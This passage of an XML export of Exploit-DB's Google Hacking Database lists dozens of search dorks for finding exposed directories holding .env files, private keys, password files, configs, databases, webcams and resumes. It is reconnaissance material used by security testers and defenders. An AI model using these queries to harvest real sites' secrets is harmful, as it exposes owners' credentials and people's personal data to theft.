# Date:19/09/2022
# Exploit Author: HackerFrenzy</textualDescription>
<query>intitle:&quot;IIS Windows Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IIS Windows Server&quot;</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>8155</id>
<link>https://www.exploit-db.com/ghdb/8155</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;config/db&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;properties.json&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of &quot; &quot;config/db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;config/db&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8132</id>
<link>https://www.exploit-db.com/ghdb/8132</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;shell.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot; &quot;shell.txt&quot;
# Files Containing Juicy Info
# Date:30/03/2023
# Exploit Author: Delowar Hossain</textualDescription>
<query>intitle:&quot;index of &quot; &quot;shell.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;shell.txt&quot;</querystring>
<edb></edb>
<date>2023-03-30</date>
<author>Delowar Hossain</author>
</entry>
<entry>
<id>6087</id>
<link>https://www.exploit-db.com/ghdb/6087</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; &quot;users.json&quot;</shortDescription>
<textualDescription>AUTHOR: ABHIJITH A
DESCRIPTION : intitle:&quot;index of &quot; &quot;users.json&quot;
Information about user data is obtained
</textualDescription>
<query>intitle:&quot;index of &quot; &quot;users.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;users.json&quot;</querystring>
<edb></edb>
<date>2020-05-15</date>
<author>ABHIJITH A</author>
</entry>
<entry>
<id>8336</id>
<link>https://www.exploit-db.com/ghdb/8336</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; *.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot; *.js&quot;
# Files Containing Juicy Info
# Date: 09/11/2023
# Exploit: Jitendra Behera</textualDescription>
<query>intitle:&quot;index of &quot; *.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; *.js&quot;</querystring>
<edb></edb>
<date>2023-11-09</date>
<author>Jitendra Behera</author>
</entry>
<entry>
<id>7364</id>
<link>https://www.exploit-db.com/ghdb/7364</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot; inurl:&quot;.bash_profile &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot; inurl:&quot;.bash_profile &quot;
# Files Containing Juicy Info
# Date:21/09/2021
# Exploit Author: Deven Rathod</textualDescription>
<query>intitle:&quot;index of &quot; inurl:&quot;.bash_profile &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; inurl:&quot;.bash_profile &quot;</querystring>
<edb></edb>
<date>2021-10-01</date>
<author>Deven Rathod</author>
</entry>
<entry>
<id>7780</id>
<link>https://www.exploit-db.com/ghdb/7780</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;/key/&quot; &quot;key.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;/key/&quot; &quot;key.txt&quot;
# Files Containing Juicy Info
# Date:12/11/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>intitle:&quot;index of &quot;/key/&quot; &quot;key.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;/key/&quot; &quot;key.txt&quot;</querystring>
<edb></edb>
<date>2021-11-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8131</id>
<link>https://www.exploit-db.com/ghdb/8131</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;application.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;application.yml&quot;
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;application.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;application.yml&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7959</id>
<link>https://www.exploit-db.com/ghdb/7959</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;cloud-config.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;cloud-config.yml&quot;
# Files Containing Juicy Info
# Date: 28/06/2022
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;cloud-config.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;cloud-config.yml&quot;</querystring>
<edb></edb>
<date>2022-06-29</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8128</id>
<link>https://www.exploit-db.com/ghdb/8128</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;conf.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;conf.json&quot;
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;conf.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;conf.json&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7947</id>
<link>https://www.exploit-db.com/ghdb/7947</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;docker-compose.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;docker-compose.yml&quot;
# Files Containing Juicy Info
# Date:20/06/2022
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;docker-compose.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;docker-compose.yml&quot;</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8188</id>
<link>https://www.exploit-db.com/ghdb/8188</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;main.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;main.yml&quot;
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: muhammetadibas</textualDescription>
<query>Files Containing Juicy Info</query>
<querystring>https://www.google.com/search?q=Files Containing Juicy Info</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>muhammetadibas</author>
</entry>
<entry>
<id>8175</id>
<link>https://www.exploit-db.com/ghdb/8175</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;phpunit.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;phpunit.yml&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;phpunit.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;phpunit.yml&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Suman Das</author>
</entry>
<entry>
<id>6284</id>
<link>https://www.exploit-db.com/ghdb/6284</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;*key.pem&quot;</shortDescription>
<textualDescription># Dork :intitle:&quot;index of /&quot; &quot;*key.pem&quot;
# Sensitive informations : Private Keys
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;*key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;*key.pem&quot;</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>8142</id>
<link>https://www.exploit-db.com/ghdb/8142</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;.apk&quot; inurl:&quot;.ir/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;.apk&quot; inurl:&quot;.ir/&quot;
# Files Containing Juicy Info
# Date: 04/06/2023
# Exploit Author: Azar A. Nariman
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;.apk&quot; inurl:&quot;.ir/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;.apk&quot; inurl:&quot;.ir/&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>8141</id>
<link>https://www.exploit-db.com/ghdb/8141</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;admin.zip&quot; &quot;admin/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;admin.zip&quot; &quot;admin/&quot;
# Files Containing Juicy Info
# Date: 06/04/2023
# Exploit Author: Azar A. Nariman
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;admin.zip&quot; &quot;admin/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;admin.zip&quot; &quot;admin/&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>8139</id>
<link>https://www.exploit-db.com/ghdb/8139</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;docker-compose.yml&quot; &quot;.env&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;docker-compose.yml&quot; &quot;.env&quot;
# Files Containing Juicy Info
# Date: 06/04/2023
# Exploit Author: Azar A. Nariman
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;docker-compose.yml&quot; &quot;.env&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;docker-compose.yml&quot; &quot;.env&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>6377</id>
<link>https://www.exploit-db.com/ghdb/6377</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /&quot; &quot;joomla/database&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Index of /&quot; &quot;joomla/database&quot;
This google dork gives us about joomla related database files and source
code related to websites running joomla it will also expose directory
listing of websites
Thanks
NaveenKumar
</textualDescription>
<query>intitle:&quot;Index of /&quot; &quot;joomla/database&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; &quot;joomla/database&quot;</querystring>
<edb></edb>
<date>2020-07-07</date>
<author>NaveenKumar</author>
</entry>
<entry>
<id>6253</id>
<link>https://www.exploit-db.com/ghdb/6253</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;nginx.conf&quot;</shortDescription>
<textualDescription>intitle:&quot;index of /&quot; &quot;nginx.conf&quot;
BY
Sagar Banwa
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;nginx.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;nginx.conf&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>8140</id>
<link>https://www.exploit-db.com/ghdb/8140</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;public.zip&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;public.zip&quot;
# Files Containing Juicy Info
# Date: 06/04/2023
# Exploit Author: Azar A. Nariman
</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;public.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;public.zip&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>8150</id>
<link>https://www.exploit-db.com/ghdb/8150</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;styleci.yml&quot; &quot;.env&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;styleci.yml&quot; &quot;.env&quot;
# Files Containing Juicy Info
# Date:12/04/2023
# Exploit Author: Azar Abdulla</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;styleci.yml&quot; &quot;.env&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;styleci.yml&quot; &quot;.env&quot;</querystring>
<edb></edb>
<date>2023-04-12</date>
<author>Azar Abdulla</author>
</entry>
<entry>
<id>8079</id>
<link>https://www.exploit-db.com/ghdb/8079</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; intext:&quot;.db</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; intext:&quot;.db
# Files Containing Juicy Info
# Date:22/02/2023
# Exploit Author: isa ghojaria</textualDescription>
<query>intitle:&quot;index of /&quot; intext:&quot;.db</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; intext:&quot;.db</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>isa ghojaria</author>
</entry>
<entry>
<id>8000</id>
<link>https://www.exploit-db.com/ghdb/8000</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /&quot; intext:&quot;.env&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; intext:&quot;.env&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: cybersploit</textualDescription>
<query>intitle:&quot;index of /&quot; intext:&quot;.env&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; intext:&quot;.env&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>cybersploit</author>
</entry>
<entry>
<id>7544</id>
<link>https://www.exploit-db.com/ghdb/7544</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /&quot; intext:&quot;pass.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /&quot; intext:&quot;pass.txt&quot;
# Files Containing Juicy Info
# Date:31/10/2021
# Exploit Author: Marko Žlender</textualDescription>
<query>intitle:&quot;Index of /&quot; intext:&quot;pass.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; intext:&quot;pass.txt&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>7958</id>
<link>https://www.exploit-db.com/ghdb/7958</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /&quot; inurl:(resume|cv)</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /&quot; inurl:(resume|cv)
# Files Containing Juicy Info
# Date: 27/06/2022
# Exploit Author: Sandesh Ajgekar</textualDescription>
<query>intitle:&quot;Index of /&quot; inurl:(resume|cv)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; inurl:(resume|cv)</querystring>
<edb></edb>
<date>2022-06-28</date>
<author>Sandesh Ajgekar</author>
</entry>
<entry>
<id>8224</id>
<link>https://www.exploit-db.com/ghdb/8224</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /api/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /api/&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /api/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /api/&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8309</id>
<link>https://www.exploit-db.com/ghdb/8309</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /app/webroot/img&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /app/webroot/img&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /app/webroot/img&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /app/webroot/img&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8225</id>
<link>https://www.exploit-db.com/ghdb/8225</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /bank/&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Index of /bank/&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /bank/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /bank/&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8311</id>
<link>https://www.exploit-db.com/ghdb/8311</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /biuro&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /biuro&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /biuro&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /biuro&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8086</id>
<link>https://www.exploit-db.com/ghdb/8086</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /cam/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /cam/&quot;
# Files Containing Juicy Info
# Date:27/02/2023
# Exploit Author: Sanu Jose M</textualDescription>
<query>intitle:&quot;Index of /cam/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /cam/&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>8039</id>
<link>https://www.exploit-db.com/ghdb/8039</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /database/migrations&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /database/migrations&quot;
# Files Containing Juicy Info
# Date:31/01/2023
# Exploit Author: Shuvrosayar Das</textualDescription>
<query>intitle:&quot;index of /database/migrations&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /database/migrations&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>Shuvrosayar Das</author>
</entry>
<entry>
<id>8304</id>
<link>https://www.exploit-db.com/ghdb/8304</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /databases&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /databases&quot;
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: Sayed Recover</textualDescription>
<query>intitle:&quot;Index of /databases&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /databases&quot;</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Sayed Recover</author>
</entry>
<entry>
<id>8308</id>
<link>https://www.exploit-db.com/ghdb/8308</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /flipbook&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /flipbook&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /flipbook&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /flipbook&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>4745</id>
<link>https://www.exploit-db.com/ghdb/4745</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /logs/&quot; &quot;lighttpd&quot;</shortDescription>
<textualDescription>Files Containing Juicy Info
Will reveal website traffic logs of sites using lighttp. Can be used to
monitor how much traffic a website is getting and where from.
*By: *edm0nd
https://twitter.com/Edmond_Major
</textualDescription>
<query>intitle:&quot;Index of /logs/&quot; &quot;lighttpd&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /logs/&quot; &quot;lighttpd&quot;</querystring>
<edb></edb>
<date>2018-04-05</date>
<author>edm0nd</author>
</entry>
<entry>
<id>7665</id>
<link>https://www.exploit-db.com/ghdb/7665</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /logs/&quot; &quot;nginx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /logs/&quot; &quot;nginx&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: jyotiprakash Rabha</textualDescription>
<query>intitle:&quot;Index of /logs/&quot; &quot;nginx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /logs/&quot; &quot;nginx&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>jyotiprakash Rabha</author>
</entry>
<entry>
<id>8313</id>
<link>https://www.exploit-db.com/ghdb/8313</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /node&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /node&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /node&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /node&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8312</id>
<link>https://www.exploit-db.com/ghdb/8312</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /node_modules/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /node_modules/&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /node_modules/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /node_modules/&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8307</id>
<link>https://www.exploit-db.com/ghdb/8307</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /vendor/guzzlehttp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /vendor/guzzlehttp&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /vendor/guzzlehttp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /vendor/guzzlehttp&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8040</id>
<link>https://www.exploit-db.com/ghdb/8040</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /webcam/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /webcam/&quot;
# Files Containing Juicy Info
# Date:31/01/2023
# Exploit Author: Shuvrosayar Das</textualDescription>
<query>intitle:&quot;Index of /webcam/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /webcam/&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>Shuvrosayar Das</author>
</entry>
<entry>
<id>8229</id>
<link>https://www.exploit-db.com/ghdb/8229</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of /wp-content/plugins&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of /wp-content/plugins&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Ritesh Sahu</textualDescription>
<query>intitle:&quot;index of /wp-content/plugins&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /wp-content/plugins&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Ritesh Sahu</author>
</entry>
<entry>
<id>8310</id>
<link>https://www.exploit-db.com/ghdb/8310</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /wp-includes/sitemaps&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /wp-includes/sitemaps&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /wp-includes/sitemaps&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /wp-includes/sitemaps&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>8306</id>
<link>https://www.exploit-db.com/ghdb/8306</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of /_MACOSX&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of /_MACOSX&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>intitle:&quot;Index of /_MACOSX&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /_MACOSX&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>7997</id>
<link>https://www.exploit-db.com/ghdb/7997</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of smtp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of smtp&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;index of smtp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of smtp&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7886</id>
<link>https://www.exploit-db.com/ghdb/7886</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; *config.php &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; *config.php &quot;
# Files Containing Juicy Info
# Date: 16/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; *config.php &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; *config.php &quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7542</id>
<link>https://www.exploit-db.com/ghdb/7542</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; .AndroidManifest.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; .AndroidManifest.xml&quot;
# Files Containing Juicy Info
# Date: 30/10/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot; .AndroidManifest.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; .AndroidManifest.xml&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7887</id>
<link>https://www.exploit-db.com/ghdb/7887</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; admin.php &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; admin.php &quot;
# Files Containing Juicy Info
# Date:16/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; admin.php &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; admin.php &quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7575</id>
<link>https://www.exploit-db.com/ghdb/7575</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; cldr-data&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; cldr-data&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; cldr-data&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; cldr-data&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7735</id>
<link>https://www.exploit-db.com/ghdb/7735</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; fileadmin &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; fileadmin &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; fileadmin &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; fileadmin &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7576</id>
<link>https://www.exploit-db.com/ghdb/7576</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot; gettext&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; gettext&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot; gettext&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; gettext&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
